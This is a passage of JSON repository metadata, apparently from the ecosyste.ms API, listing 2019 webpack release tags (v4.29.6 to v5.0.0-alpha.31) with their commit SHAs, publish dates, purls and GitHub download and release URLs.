om/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed